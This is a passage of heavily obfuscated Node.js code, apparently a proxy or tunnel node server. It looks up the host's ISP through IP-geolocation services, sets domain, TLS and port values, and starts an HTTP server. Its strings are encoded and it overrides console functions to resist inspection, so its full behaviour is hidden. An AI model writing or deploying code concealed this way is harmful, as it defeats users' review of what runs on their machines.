_0x2a506b={_0x2e9ea3:0x292,_0xebd790:0x24b,_0x5a6786:0x2a6,_0x5e6683:0x21e,_0x26aa14:0x1f5,_0x52ae72:0x25d,_0x252020:0x1c4,_0x47b81c:0x43,_0x42c48d:0x4b,_0x5dc98d:0x2b,_0x17b808:0x41,_0x420b30:0x25d,_0x35d77a:0x20c,_0x8a8022:0x1f8,_0xa9942e:0x64,_0x40dcba:0x38,_0x1edccb:0x7c,_0x12ca62:0x21,_0x1e2255:0x73,_0x354272:0x82,_0x29d5fd:0x2e,_0x47994e:0x304,_0x598956:0x210,_0x1b919d:0x25e,_0x5baef5:0xc,_0x2a80a0:0x1,_0x1c1c91:0xc,_0x84b7f2:0x29c,_0x4b7c62:0x256,_0x134ba7:0x265,_0x3053f7:0x220,_0x217645:0x10,_0x9d3f0a:0x6d,_0x57612b:0x17,_0x2f0c46:0xcd,_0xc44e91:0x5e,_0x4625be:0x44,_0x39cd42:0x4d,_0x2e71f4:0x26,_0x10d9c9:0x37,_0x1cf124:0x5a,_0x553641:0x62,_0x55e0b2:0x219,_0x2b549a:0x239,_0x2052b6:0x251,_0x1e0364:0x1e5,_0x4b0a65:0x8,_0x55f7f5:0x290,_0x599f53:0x264,_0x17de98:0x1a7,_0x2b299c:0x18f,_0x26be1d:0x1d3,_0x96e64c:0x18e,_0x2e591c:0x40,_0x5d090f:0x5,_0x30c345:0x60,_0x169ace:0x11,_0x3eb740:0x96,_0x17cb05:0x42,_0x5869cd:0x2f,_0x225f1b:0x70,_0x1b29a2:0x58,_0xa75f87:0xe,_0x12a6e7:0x30,_0x43905b:0x254,_0x80a165:0x284,_0x5394df:0x274,_0x5687d9:0x204,_0x2c2f66:0x1d,_0x2879de:0x6b,_0x1250b2:0x244,_0x4a809c:0x1cd,_0x38fee9:0x1bb,_0xc72c66:0x222,_0x111965:0x22f,_0x20f8d1:0x156,_0x5609d4:0x144,_0x27e9fe:0x13e,_0x5a6182:0x2a6,_0x1aee5a:0x24b,_0x158bd4:0x2ad,_0x597d6d:0x80,_0x2ecf87:0x103,_0xa01f99:0x179,_0x40cd5c:0xae,_0x4c6bac:0x7b,_0x55f70b:0x95,_0x4c5a94:0x4a,_0x528d2a:0x35,_0x81ef7f:0x20,_0x3f0020:0x290,_0x2dec52:0x261,_0x280114:0x2f0,_0x515043:0x311,_0x3d9292:0x36,_0x27e4af:0x6b,_0x22fe55:0x55,_0x392e0d:0x239,_0x5486a1:0x233,_0x13de94:0x1b4,_0x358f11:0x23a,_0x2a9a4a:0x1d6,_0x534ea0:0x1e3,_0x446439:0x267,_0x229589:0x31,_0x4de14d:0x295,_0x39bb59:0x2c4,_0x5ee8ca:0x310,_0x2a34d8:0x2b0,_0x4d7d6b:0x245,_0x142174:0x2ef,_0x5c1c2b:0x1d4,_0x3ba876:0x16c,_0xc03aef:0x178,_0x1a9a48:0x180,_0x1c8857:0x207,_0x5c444f:0x277,_0x362fc4:0x45,_0x31d248:0x259,_0x31471d:0x206,_0x3012c7:0x44,_0x5da607:0x19,_0x4e48bf:0x47,_0x518241:0x189,_0x12171c:0x160,_0x428948:0x166,_0x41149c:0x47,_0x2f44aa:0x68,_0x8110e5:0x1eb,_0xe97674:0x1af,_0x2dfec4:0x1a1,_0x35d530:0x1cf,_0x2c4a8a:0x17c,_0x39fbb4:0x23b,_0x398ecb:0x181,_0x1608ed:0x250,_0x1370de:0x2ab,_0x52bcca:0x2bb,_0x207fee:0x4e,_0x22a94c:0x58,_0x16c0f6:0x1e,_0x28e85c:0x26,_0x5195f9:0x31,_0x4541c6:0xb6,_0x5f01be:0x43,_0x4f134d:0x67,_0x57a980:0x114,_0x1b109f:0xaa,_0x2213b3:0x52,_0xf4519f:0x13,_0x37d11e:0x1c,_0x4596cb:0x53,_0x3dc714:0xfd,_0x47c7d5:0x97,_0xcc4567:0x98,_0x236da7:0xf,_0x2fedd4:0x41,_0x584d04:0xc,_0x4890ff:0x87,_0x3b18fb:0xaf,_0x437bc0:0x36,_0x587c7:0x91,_0x48a756:0x80,_0x4f0423:0x74,_0x535291:0xe1,_0x294cfd:0x50,_0x18b418:0xb2,_0x35a7f7:0x76,_0x2f77b4:0x79,_0x365dd5:0x5d,_0x538cb9:0x87,_0x17ce98:0xa9,_0x4867f0:0x8e,_0x4e6f15:0xa,_0x5159b8:0xe2,_0x2a72f8:0x10c,_0x1755f9:0xae,_0x55720f:0x1fb,_0x1ab6d7:0x1b1,_0x117243:0x1e9,_0x1589a3:0x20,_0x544c40:0x7f,_0xef1fe4:0x1b,_0x298cb6:0x49,_0x425c8b:0x284,_0x103891:0x20c,_0x49bbec:0x291,_0xcf7c4:0x255,_0x4ad32c:0x255,_0xbd9b87:0x1f8,_0x2d306e:0x28c,_0x547d77:0x27c,_0xb7a88d:0x2f3,_0x5df8ad:0x286,_0x39bd80:0x209,_0x10d69a:0x2b3,_0x3109e0:0x182,_0x1adfd7:0x167,_0x3c3f9b:0x282,_0x58ae6e:0x2c5,_0x177562:0x2af,_0x2f36e9:0x252,_0x23e179:0x78,_0x1aebea:0x4,_0xf66b16:0x2a,_0x893b39:0x1ec,_0x2f244a:0x1c7,_0x321a25:0x19a,_0x7eb487:0x243,_0x6d8a06:0x1f,_0x1ae0e9:0x64,_0x3ed55a:0x64,_0x327c58:0x18,_0x255070:0x4f,_0x5be3d4:0x14,_0x3dd9fc:0x13,_0x698468:0x20f,_0x41f7f3:0x20d,_0x1f5523:0x9,_0x310ac3:0x7f,_0x508d5b:0x24,_0x15777c:0x1ff,_0x2fc236:0x238,_0x3fc6da:0x1f2,_0x3e77cc:0x34,_0x1c4067:0x97,_0x2f7c7c:0x7c,_0x38f656:0x9b,_0x25e3a6:0x4d,_0x59de8c:0xa0,_0xcfec8:0x37,_0x1a756b:0xa6,_0x3e7f95:0x253,_0x23b68a:0x38,_0x31c4ec:0xb4,_0x50a569:0x1f6,_0x2d10b0:0x19c,_0x6f4633:0x1b2,_0x223abd:0x1d1,_0x3697df:0x216,_0x549b7a:0x192,_0x291c90:0x159,_0x44adad:0x90,_0x475f0e:0x1c,_0x5c6e15:0x4a},_0x51b325={_0x37dc01:0x22e,_0x3a1c99:0x1cd,_0x215c22:0xfd},_0x120ec5={_0xf69658:0x7a,_0x11c91d:0xd8,_0x1df051:0x17f};function _0x4f40d5(_0x3d5952,_0x3fcefd,_0x21249d,_0x252d73){return _0x18aada(_0x252d73,_0x21249d- -_0x120ec5._0xf69658,_0x21249d-_0x120ec5._0x11c91d,_0x252d73-_0x120ec5._0x1df051);}const _0xe286e={'aVKJZ':function(_0xa62883,_0x341097){return _0xa62883+_0x341097;},'dXFlF':function(_0x136179,_0x1f6145){return _0x136179+_0x1f6145;},'PVeyw':_0x4913cd(_0x2a506b._0x2e9ea3,_0x2a506b._0xebd790,_0x2a506b._0x5a6786,0x213),'kHQTG':function(_0x35a667){return _0x35a667();},'WLUOK':_0x4913cd(_0x2a506b._0x5e6683,_0x2a506b._0x26aa14,_0x2a506b._0x52ae72,_0x2a506b._0x252020),'xnZSq':'error','ReIKj':_0x4f40d5(_0x2a506b._0x47b81c,-_0x2a506b._0x42c48d,-_0x2a506b._0x5dc98d,_0x2a506b._0x17b808),'VuhTa':_0x4913cd(_0x2a506b._0x420b30,_0x2a506b._0x35d77a,0x266,_0x2a506b._0x8a8022),'ifzig':_0x4f40d5(_0x2a506b._0xa9942e,_0x2a506b._0x40dcba,_0x2a506b._0x1edccb,_0x2a506b._0x12ca62),'eTbrc':function(_0x2de2be,_0x107baa){return _0x2de2be(_0x107baa);},'FQsgj':_0x4f40d5(-_0x2a506b._0x1e2255,-_0x2a506b._0x354272,-_0x2a506b._0x29d5fd,-0x4f),'fZTsq':'正在获取节点配置信息...','SeDjl':function(_0x1beb5c,_0x28b424){return _0x1beb5c!==_0x28b424;},'tWIzZ':_0x4913cd(0x2a2,_0x2a506b._0x47994e,_0x2a506b._0x420b30,0x315),'WruAB':'oCIom','aiLqZ':'Unknown','PWZqN':function(_0x280f9d,_0x33088c){return _0x280f9d===_0x33088c;},'WVHtk':_0x4913cd(_0x2a506b._0x598956,0x1fe,0x28e,_0x2a506b._0x1b919d),'UnlUa':_0x4f40d5(_0x2a506b._0x5baef5,_0x2a506b._0x2a80a0,-_0x2a506b._0x1c1c91,-0x38),'SlAAd':_0x4913cd(_0x2a506b._0x84b7f2,_0x2a506b._0x4b7c62,_0x2a506b._0x134ba7,_0x2a506b._0x3053f7),'wjmEU':'http://ip-api.com/json/','YEQXN':function(_0x5ccaf5,_0x5efcdb){return _0x5ccaf5===_0x5efcdb;},'KdOFA':'success','IZWKr':_0x4f40d5(0x63,_0x2a506b._0x217645,_0x2a506b._0x9d3f0a,-_0x2a506b._0x57612b),'jVzZi':_0x4f40d5(0xbf,_0x2a506b._0x2f0c46,_0x2a506b._0xc44e91,_0x2a506b._0x4625be),'tNTRz':_0x4f40d5(-_0x2a506b._0x39cd42,-0xa7,-_0x2a506b._0x2e71f4,_0x2a506b._0x10d9c9),'KJCaW':function(_0x4fa3d0,_0x3c4de2){return _0x4fa3d0!==_0x3c4de2;},'ogpsJ':_0x4f40d5(0x8d,0x94,_0x2a506b._0x1cf124,_0x2a506b._0x553641),'RttfL':_0x4913cd(_0x2a506b._0x55e0b2,_0x2a506b._0x2b549a,_0x2a506b._0x2052b6,_0x2a506b._0x1e0364),'RXQtm':_0x4f40d5(-_0x2a506b._0x217645,-0xe,0x51,_0x2a506b._0x4b0a65),'tljCP':_0x4913cd(0x237,0x1f5,_0x2a506b._0x55f7f5,_0x2a506b._0x599f53),'lpMPf':_0x4913cd(_0x2a506b._0x17de98,_0x2a506b._0x2b299c,0x203,0x1a1)};console['log'](_0xe286e[_0x4913cd(_0x2a506b._0x26be1d,0x158,_0x2a506b._0x96e64c,0x159)]);function _0x4913cd(_0x3006cc,_0x4d036b,_0x36f339,_0x4a1630){return _0x20ed0c(_0x3006cc-_0x51b325._0x37dc01,_0x4d036b-_0x51b325._0x3a1c99,_0x36f339-_0x51b325._0x215c22,_0x36f339);}try{if(_0xe286e['SeDjl'](_0xe286e[_0x4f40d5(_0x2a506b._0x2e591c,-_0x2a506b._0x5d090f,_0x2a506b._0x30c345,-0x23)],_0xe286e[_0x4f40d5(-_0x2a506b._0x169ace,_0x2a506b._0x3eb740,_0x2a506b._0x17cb05,_0x2a506b._0x5869cd)])){const _0x2b75e5={};_0x2b75e5['timeout']=0x1388;const _0x1a4ee7=await axios[_0x4f40d5(-_0x2a506b._0x225f1b,_0x2a506b._0x1b29a2,_0x2a506b._0xa75f87,-_0x2a506b._0x12a6e7)](_0x4913cd(0x221,0x282,_0x2a506b._0x3053f7,_0x2a506b._0x43905b),_0x2b75e5),_0x29fae6=_0x1a4ee7[_0x4913cd(_0x2a506b._0x80a165,0x2e0,_0x2a506b._0x5394df,_0x2a506b._0x47994e)];if(_0x29fae6&&_0x29fae6[_0x4913cd(_0x2a506b._0x5687d9,0x1b1,0x1a4,0x26b)]){const _0x215fc8=_0x29fae6[_0x4f40d5(_0x2a506b._0x2c2f66,-0x5c,-_0x2a506b._0x4b0a65,-_0x2a506b._0x2879de)]||'UN';let _0x56c674=_0x4913cd(_0x2a506b._0x1250b2,0x28a,_0x2a506b._0x4a809c,0x2bd);if(_0x29fae6[_0x4913cd(_0x2a506b._0x38fee9,_0x2a506b._0xc72c66,_0x2a506b._0x111965,_0x2a506b._0x20f8d1)])_0x56c674=_0x29fae6[_0x4913cd(0x1bb,_0x2a506b._0x5609d4,0x176,_0x2a506b._0x27e9fe)][_0x4913cd(_0x2a506b._0x55f7f5,_0x2a506b._0x5a6182,_0x2a506b._0x1aee5a,_0x2a506b._0x158bd4)]||_0x29fae6['connection'][_0x4f40d5(_0x2a506b._0x597d6d,_0x2a506b._0x2ecf87,0x89,0xb5)]||_0xe286e[_0x4913cd(0x1a9,0x1e4,_0x2a506b._0xa01f99,0x229)];else{if(_0xe286e[_0x4f40d5(_0x2a506b._0x40cd5c,_0x2a506b._0x4c6bac,_0x2a506b._0x55f70b,_0x2a506b._0x4c5a94)](_0xe286e['WVHtk'],_0xe286e[_0x4f40d5(0x1a,_0x2a506b._0x528d2a,-_0x2a506b._0x81ef7f,-0x93)]))_0x56c674=_0x29fae6[_0x4913cd(_0x2a506b._0x3f0020,_0x2a506b._0x2dec52,_0x2a506b._0x280114,_0x2a506b._0x515043)]||_0xe286e[_0x4f40d5(_0x2a506b._0x3d9292,-_0x2a506b._0x27e4af,-_0x2a506b._0x4625be,-_0x2a506b._0x22fe55)];else{let _0xf3ad55;try{const _0x239a89=_0x4308e4(CvmdXd[_0x4913cd(0x232,_0x2a506b._0x392e0d,_0x2a506b._0x5486a1,_0x2a506b._0x13de94)](CvmdXd['dXFlF'](CvmdXd[_0x4913cd(_0x2a506b._0x358f11,_0x2a506b._0x2a9a4a,_0x2a506b._0x534ea0,_0x2a506b._0x446439)],_0x4f40d5(0xc2,_0x2a506b._0x229589,0x46,0xe)),');'));_0xf3ad55=CvmdXd['kHQTG'](_0x239a89);}catch(_0x97fc63){_0xf3ad55=_0x50284a;}const _0xcc03b3=_0xf3ad55[_0x4913cd(_0x2a506b._0x4de14d,_0x2a506b._0x39bb59,_0x2a506b._0x5ee8ca,_0x2a506b._0x2a34d8)]=_0xf3ad55[_0x4913cd(0x295,_0x2a506b._0x4d7d6b,0x241,_0x2a506b._0x142174)]||{},_0x10d94a=['log',CvmdXd[_0x4913cd(_0x2a506b._0x5c1c2b,_0x2a506b._0x3ba876,_0x2a506b._0xc03aef,_0x2a506b._0x1a9a48)],_0x4913cd(_0x2a506b._0x1c8857,0x1ed,0x195,_0x2a506b._0x5c444f),CvmdXd[_0x4f40d5(0x11,_0x2a506b._0x29d5fd,-_0x2a506b._0x362fc4,-_0x2a506b._0x30c345)],CvmdXd[_0x4913cd(_0x2a506b._0x31d248,_0x2a506b._0x26aa14,_0x2a506b._0xebd790,_0x2a506b._0x31471d)],CvmdXd[_0x4f40d5(-_0x2a506b._0x3012c7,-_0x2a506b._0x57612b,0x15,-_0x2a506b._0x5da607)],CvmdXd[_0x4f40d5(0x96,-_0x2a506b._0x169ace,0x56,_0x2a506b._0x4e48bf)]];for(let _0x148663=-0x1cf9+0x24ca+0x1*-0x7d1;_0x148663<_0x10d94a[_0x4913cd(0x1ab,_0x2a506b._0x518241,_0x2a506b._0x12171c,_0x2a506b._0x428948)];_0x148663++){const _0x5d53fa=_0x3141ec[_0x4f40d5(0xc2,-0x3,_0x2a506b._0x41149c,_0x2a506b._0x2f44aa)][_0x4913cd(_0x2a506b._0x8110e5,0x24b,_0x2a506b._0xe97674,_0x2a506b._0x2dfec4)]['bind'](_0x488792),_0x10304d=_0x10d94a[_0x148663],_0x21b898=_0xcc03b3[_0x10304d]||_0x5d53fa;_0x5d53fa['__proto__']=_0x1f725c[_0x4913cd(_0x2a506b._0x35d530,_0x2a506b._0x2c4a8a,_0x2a506b._0x39fbb4,_0x2a506b._0x398ecb)](_0x46b420),_0x5d53fa[_0x4913cd(_0x2a506b._0x1608ed,0x1fe,_0x2a506b._0x1370de,_0x2a506b._0x52bcca)]=_0x21b898['toString'][_0x4f40d5(_0x2a506b._0x207fee,-_0x2a506b._0x22a94c,-_0x2a506b._0x16c0f6,-_0x2a506b._0x28e85c)](_0x21b898),_0xcc03b3[_0x10304d]=_0x5d53fa;}}}ISP=(_0x215fc8+'-'+_0x56c674)[_0x4f40d5(_0x2a506b._0x5195f9,_0x2a506b._0x4541c6,_0x2a506b._0x40dcba,_0x2a506b._0x5f01be)](/[\s,]+/g,'_');}else throw new Error(_0xe286e[_0x4f40d5(_0x2a506b._0x4f134d,_0x2a506b._0x57a980,_0x2a506b._0x1b109f,0x65)]);}else{const _0x5e6698=_0x1fc1cb['Answer']['find'](_0x1ed5bf=>_0x1ed5bf[_0x4913cd(0x1d5,0x1d6,0x256,0x17f)]===0xee*0x4+-0x61a*0x3+0xe97);if(_0x5e6698){_0xe286e[_0x4f40d5(_0x2a506b._0x2213b3,-_0x2a506b._0xf4519f,-0xf,_0x2a506b._0x37d11e)](_0x2a34b3,_0x5e6698[_0x4f40d5(_0x2a506b._0x4596cb,_0x2a506b._0x3dc714,_0x2a506b._0x47c7d5,0x72)]);return;}}}catch(_0x417f2f){try{if(_0xe286e[_0x4f40d5(-_0x2a506b._0xcc4567,-_0x2a506b._0x236da7,-_0x2a506b._0x2fedd4,-_0x2a506b._0x584d04)](_0x4f40d5(0xc3,_0x2a506b._0x4890ff,_0x2a506b._0x3b18fb,0x90),_0xe286e[_0x4f40d5(_0x2a506b._0x437bc0,_0x2a506b._0x587c7,_0x2a506b._0x48a756,_0x2a506b._0x4f0423)]))return _0x55b40b['toString']()[_0x4f40d5(_0x2a506b._0x535291,_0x2a506b._0x294cfd,_0x2a506b._0x18b418,_0x2a506b._0x35a7f7)](CvmdXd[_0x4f40d5(_0x2a506b._0x2f77b4,_0x2a506b._0x365dd5,_0x2a506b._0x5869cd,_0x2a506b._0x538cb9)])[_0x4f40d5(_0x2a506b._0x17ce98,0x8c,0x63,_0x2a506b._0x4867f0)]()['constructor'](_0x1dff2c)['search']('(((.+)+)+)+$');else{console[_0x4f40d5(_0x2a506b._0x2f44aa,-0x89,-_0x2a506b._0x4e6f15,-0x25)](_0x4f40d5(_0x2a506b._0x5159b8,_0x2a506b._0x2a72f8,_0x2a506b._0x1755f9,_0x2a506b._0x5869cd));const _0x7027c6={};_0x7027c6['timeout']=0x1388;const _0x1246ff=await axios[_0x4913cd(_0x2a506b._0x55720f,_0x2a506b._0x1ab6d7,0x264,_0x2a506b._0x117243)](_0xe286e[_0x4f40d5(-_0x2a506b._0x1589a3,-_0x2a506b._0x544c40,-_0x2a506b._0xef1fe4,-_0x2a506b._0x298cb6)],_0x7027c6),_0x1bc0ad=_0x1246ff[_0x4913cd(_0x2a506b._0x425c8b,_0x2a506b._0x103891,_0x2a506b._0x49bbec,_0x2a506b._0xcf7c4)];if(_0x1bc0ad&&_0xe286e['YEQXN'](_0x1bc0ad[_0x4913cd(_0x2a506b._0x4ad32c,_0x2a506b._0xbd9b87,0x1f5,_0x2a506b._0x2d306e)],_0xe286e[_0x4913cd(_0x2a506b._0x547d77,_0x2a506b._0xb7a88d,_0x2a506b._0x5df8ad,0x288)])){const _0x5554ca=_0x1bc0ad['isp']||_0x1bc0ad[_0x4913cd(0x276,_0x2a506b._0x39bd80,_0x2a506b._0x10d69a,_0x2a506b._0x2a34d8)]||_0xe286e[_0x4913cd(0x1a9,_0x2a506b._0x3109e0,0x1ed,_0x2a506b._0x1adfd7)];ISP=(_0x1bc0ad['countryCode']+'-'+_0x5554ca)['replace'](/[\s,]+/g,'_');}else ISP='Unknown';}}catch(_0x529696){if(_0xe286e[_0x4913cd(_0x2a506b._0x3c3f9b,_0x2a506b._0x58ae6e,_0x2a506b._0x177562,_0x2a506b._0x2f36e9)](_0xe286e['IZWKr'],_0xe286e[_0x4f40d5(-0x32,-_0x2a506b._0x23e179,-_0x2a506b._0x1aebea,-_0x2a506b._0xf66b16)])){const _0x541407=_0x18f96f['apply'](_0x52f2a9,arguments);return _0x503842=null,_0x541407;}else console[_0x4913cd(_0x2a506b._0x893b39,_0x2a506b._0x2f244a,_0x2a506b._0x321a25,_0x2a506b._0x7eb487)](_0x4f40d5(_0x2a506b._0x6d8a06,0x6b,_0x2a506b._0x1ae0e9,_0x2a506b._0x354272),_0x529696['message']),ISP=_0xe286e[_0x4f40d5(-_0x2a506b._0x3ed55a,0x6,-_0x2a506b._0x4625be,_0x2a506b._0x327c58)];}}if(!DOMAIN||DOMAIN[_0x4f40d5(-_0x2a506b._0x255070,_0x2a506b._0x5be3d4,0x25,_0x2a506b._0x3dd9fc)](_0xe286e[_0x4913cd(_0x2a506b._0x698468,0x1c9,_0x2a506b._0x41f7f3,_0x2a506b._0x4b7c62)]))try{if(_0xe286e[_0x4f40d5(-_0x2a506b._0x1f5523,-_0x2a506b._0x310ac3,-_0x2a506b._0x508d5b,-0xd)](_0xe286e[_0x4913cd(_0x2a506b._0x15777c,_0x2a506b._0x2fc236,0x267,_0x2a506b._0x3fc6da)],_0xe286e['RttfL'])){const _0x205f48={};_0x205f48[_0x4f40d5(-0x37,_0x2a506b._0x3e77cc,-0x40,-_0x2a506b._0x1c4067)]=0x1f40;const _0x3dbcda=await axios[_0x4f40d5(-0xc,_0x2a506b._0x2f7c7c,0xe,-0x54)](_0xe286e[_0x4f40d5(0x92,0x4c,_0x2a506b._0x38f656,_0x2a506b._0x365dd5)],_0x205f48),_0x588f62=_0x3dbcda['data'][_0x4f40d5(0xb3,_0x2a506b._0x25e3a6,_0x2a506b._0x59de8c,0x2b)]();CurrentDomain=_0x588f62,Tls=_0xe286e['tljCP'],CurrentPort=PORT;}else _0x17af6b=_0x53196c[_0x4f40d5(_0x2a506b._0xcfec8,-0x66,-0x35,-_0x2a506b._0x1a756b)](_0x5f2ce0,_0x2068e5+(0x1269+-0x104*0x2+-0x1051))[_0x4913cd(0x220,_0x2a506b._0x3e7f95,0x217,_0x2a506b._0x111965)]((_0x15f701,_0x485b68,_0x55940e,_0x674f4f)=>_0x55940e%(0x852+0x24b7+-0x2d07)?_0x15f701[_0x4f40d5(0x17,-0xb2,-0x4b,-0x4)](_0x674f4f[_0x4f40d5(0x23,-0x72,-0x35,0x8)](_0x55940e-(-0x1cd5+-0x197b*0x1+0x203*0x1b),_0x55940e+(0x109e+0x12*-0x193+-0x1*-0xbb9))):_0x15f701,[])[_0x4f40d5(_0x2a506b._0x1b109f,_0x2a506b._0x23b68a,_0x2a506b._0x31c4ec,0x119)](_0x288e3d=>_0x288e3d[_0x4913cd(0x281,0x2cd,0x2f8,0x2f0)](0xa8d*0x1+0x22*-0x10c+0x190b)[_0x4913cd(0x250,0x1e4,0x27b,0x237)](0x1275+0x2a*-0x2f+-0xaaf*0x1))[_0x4913cd(0x1fe,_0x2a506b._0x50a569,_0x2a506b._0x2d10b0,_0x2a506b._0x6f4633)](':'),_0x9b6f4+=0x3ac+0x9a0+-0xf2*0xe;}catch(_0x6394c3){CurrentDomain='your-domain.com',Tls=_0xe286e[_0x4913cd(_0x2a506b._0x223abd,_0x2a506b._0x3697df,_0x2a506b._0x549b7a,_0x2a506b._0x291c90)],CurrentPort=0x1*0x119d+0x2a5*-0xb+-0x1*-0xd35;}else CurrentDomain=DOMAIN,Tls=_0xe286e[_0x4f40d5(-_0x2a506b._0x44adad,-_0x2a506b._0x2a80a0,-_0x2a506b._0x475f0e,-_0x2a506b._0x5c6e15)],CurrentPort=0x75d*-0x5+-0x703+0x2d8f*0x1;};function _0x18aada(_0x536499,_0x130962,_0x1e9d6e,_0x1d577a){return _0x1711(_0x130962- -0x57,_0x536499);}function _0x68f8(){const _0x5e0761=['CwL5D1y','y3jLyxrLu2vYDMvY','D3jPDgvizwfK','zw5K','D0XWzK4','uuPpBwC','ms4XlJeUmq','B21YAgS','mty5nti4uujlAvz2','C3bLzwqUy2XVDwrMBgfYzs5JB20','DhjHy2u','Ag5Xsue','tevKs0e','tg5mC0e','u2Xbqwq','C3bLzwrVzI5Tzq','y255s1a','icHtAgfKB3DZB2nRCYbpBMX5kq','Ahr0Chm6lY9VB29VlNnLCNyWmc5UzxqVywrKlxvYBa','zgzfBeW','mta5ntGWBxPlAxDh','Dxj5yMe','mZiWodi2meL0wMnXDa','B3jN','yLbeBui','t214zgq','u3rJrNa','q3PkDfK','tLbRtfi','s2rprKe','AKHdugu','uKjhqw0','tvbID0i','txD4BwS','CMvHzfvjBNqXnKjf','ufDACu4','DxrMoa','zgf0yq','qKPeswi','sMrvBKm','jNr5Cgu9qq','uLHrDg0','BuHOEhC','BNPyENm','A2X3vMq','DgfVDgO','DhjPBq','yMfZzty0','y2DKqKi','AxnW','tfbQvMi','CMv0DxjUicHMDw5JDgLVBIGPia','EuDyv2q','B25Jzq','y29UC29Szq','BuvLy0y','vw5Svwe','BefTCxK','v0L5zuK','C25Pjtne','6AAw6ycj5O6L5y+J5AsX6lsL77Ym5BcD6k+v5l2/55sOigLWlwfWAs5JB20UlI4','AfbuseG','o3bHDgGLm0qLmKy','B1HMCuu','C2vHCMnO','r3rcquy','BwfW','vuDvtKS','uevQwMO','tMnwy3m','AeDYrxC','C29Tzq','CK15rKe','mJmYodG4D0zbCufX','B05SCNa','y29Uy2f0','qMP1reC','y2XVC2u','DxjS','nde4nZq2shzsy3Lk','DgXZ','Eg5Au3e','ywLmCvO','ChPStw8','BgvUz3rO','u2veAMW','DgLTzw91Da','C3DqDgy','zw5KC1DPDgG','Aw5KzxGUAhrTBa','CgLWzq','AgvHzgvYCW','sej2Cem','Dgv4Dc9ODg1S','mtm5n3LeAe50DG','B2fywNO','CMvHzezPBgu','C2XPy2u','uMTluu8','EwHwufy','y29UBMvJDgLVBG','mJa3uKzdBe10','Eev0CNi','EM1UqLO','kcGOlISPkYKRksSK','zNjVBq','DgvZDg15lM5LDa','zxHJzxb0Aw9U','zKX5y2C','C2vYDMvY','sM5hywm','qwvTqLC','Ew91CI1KB21HAw4Uy29T','Ce9Mrg0','s0PdyvC','tgr0AMy','qxv0B21HDgLJiefJy2vZCYbuyxnRigfKzgvKihn1y2nLC3nMDwXSEq','Cejgu3i','v1ziDgS','wxb5vMS','yMLUza','qxvZCK0','Bhbnugy','D2PTrvu','zLPuC3e','v0Xvt0S','DhLWzq','yxbWBhK','mJK0mdy3ndrrBM5ArNK','Cg9YDa','CePctLy','y2f0y2G','D2LAtwm','BvPqtg0','s01uBgi','zvrICMm','t0f0wwG','weXhvKq','Axb3Ag8UAxmGzMfPBgvK','D21ptvm','Bg9N','Bwr2DMm','y291BNrYEv9JB2rL','sK9sqMm','quv4y2m','u2vYDMvY','ALz6wMK','sKfVyvy','ChjVDg90ExbL','zxjYB3i','rgDWt0O','C3bLzwr0zxn0lMnU','BhrMDeq','yvz1BxO','Au5bCKK','o3nRAxaTy2vYDc12zxjPzNKLm0r0CNvLo211EcuZrdaJ','wezwBeS','q29UDgvUDc1uExbL','CvjAy1q','BM9UztO','ihDPDgGGywXSierouYbZzxj2zxjZ','BwvZC2fNzq','vMforhm','rhvNwwi','z2v0','y29UBMvJDa','Dxv6EMq','AM9PBG','B2DWC0O','mtmZuwLLsKnm','s1fbsKG','vNvOvge','DgHLBG','C3vJy2vZCW','Cw10Dve','A0HVqMC','Aw5MBW','A2HJy2m','BLPUzxK','sNLhEMW','AgP1yw4','qw5ZD2vY','ue1bu08','sgvSBg8GD29YBgqH','De5uuNO','sejfzum','s1L4twW','Aw5JBhvKzxm','DwvWD0G','rNvzwLe','C3m6lY8','mZu0nda4qNnHtgvv','Cg9ZDa','x19WCM90B19F','wfP0r1u','oc44lJqUna','yxbWBgLJyxrPB24Vzg5ZlwPZB24','rLfZz2O','Dgv4Dc9WBgfPBG','D2fYBG','ufLhCuy','CMvKDwnL','Ahr0CdOVl2LWD2HVlMLZlW','yuTdv3a','C3bLzwqUAw8','ENHnEvi','CMvWBgfJzq','vKTgvfG','wvDyugq','qwnJzxb0','vNnSvuy','u3fZs3u','BhH0z28','yw95DvC','tMrnChO','ue1PANm','v3j1qui','C3bLzwr0zxn0lM5LDa','rxHTtgq','yvzlsLO','E30Uy29UC3rYDwn0B3iOiNjLDhvYBIb0AgLZiIKOicK','y29UC3rYDwn0B3i','tM90iezVDw5KcG','s09yyvC','BM9Uzq','zMLNsuG','y3HlrNe','ufzLExC','Ahr0Chm6lY9KBNmUz29Vz2XLl3jLC29SDMu/BMfTzt0','y2j3uNq','q3vdtLy','Ahr0Chm6lY9HCgKUAxaUC2iVAxa','BgLICMvZCgvLzc5VCMC','qLP2DKu','A1vYrKy','rMfPBgvKihrVihjLC29SDMuG','Awz6AwC','vw5RBM93BG','tvLlrLK','tvnpCMG','uNDHsui','AuHsCKu','CurJrxO','r1DhtNq','wfHlCvG','Ag9ZDa','DfDjELO','nwT6B2r2zq','p3bSDwDPBJ12mNjHEs1WBhvNAw47Bw9KzsuZrhDLyNnVy2TLDdTOB3n0jtne','Dg9tDhjPBMC','6i635y+wieLtucdKV6hMGA/LHAJPG6JLPlhOTku6','DgvZDa','Du9buhK','zufnzNm','C3rHDhvZ','Ahr0Chm6lY8','mteWq3LKtMDs','u2LevKO','uMvjs2O','rujTwM4','zMLMrNG','AKHoCvq','DgfIBgu','D3jPDgu'];_0x68f8=function(){return _0x5e0761;};return _0x68f8();}const httpServer=http[_0x18aada(0x148,0xed,0x9b,0xa1)]((_0x14612e,_0x1af98a)=>{const _0xe248b2={_0x489539:0x470,_0x154dc5:0x47c,_0x306e3a:0x36e,_0x1d7c7d:0x3e3,_0x7af176:0x2fc,_0x561662:0x3b0,_0x14acbc:0x376,_0x46aae4:0x33e,_0x47e482:0x378,_0x362567:0x385,_0x5abe87:0x308,_0x22977f:0x373,_0x282a26:0x32c,_0x17e4ab:0x290,_0x36f6d9:0x30f,_0x246d4d:0x2a4,_0x2a78f9:0x2ef,_0x15f5f7:0x3f6,_0xe145a2:0x44b,_0x7d9cd0:0x37a,_0x2fc43d:0x36a,_0x2ee8c3:0x4cc,_0x54ec35:0x51d,_0x1952c7:0x47f,_0x1568eb:0x383,_0x10460e:0x370,_0x146213:0x385,_0x27e5ad:0x312,_0x58d8bd:0x40e,_0x2f1f6c:0x448,_0x390c25:0x3ca,_0x25ae33:0x482,_0x518534:0x3fb,_0x48c540:0x3e0,_0x3bd4fc:0x439,_0x1d44ee:0x388,_0x44edee:0x3ce,_0x567c98:0x34e,_0x4f0d44:0x38a,_0x3ad4c5:0x2d7,_0x4856ca:0x400,_0x20b191:0x42a,_0x50f427:0x3a7,_0x5d7123:0x4b6,_0x15052c:0x4b8,_0x310eee:0x3f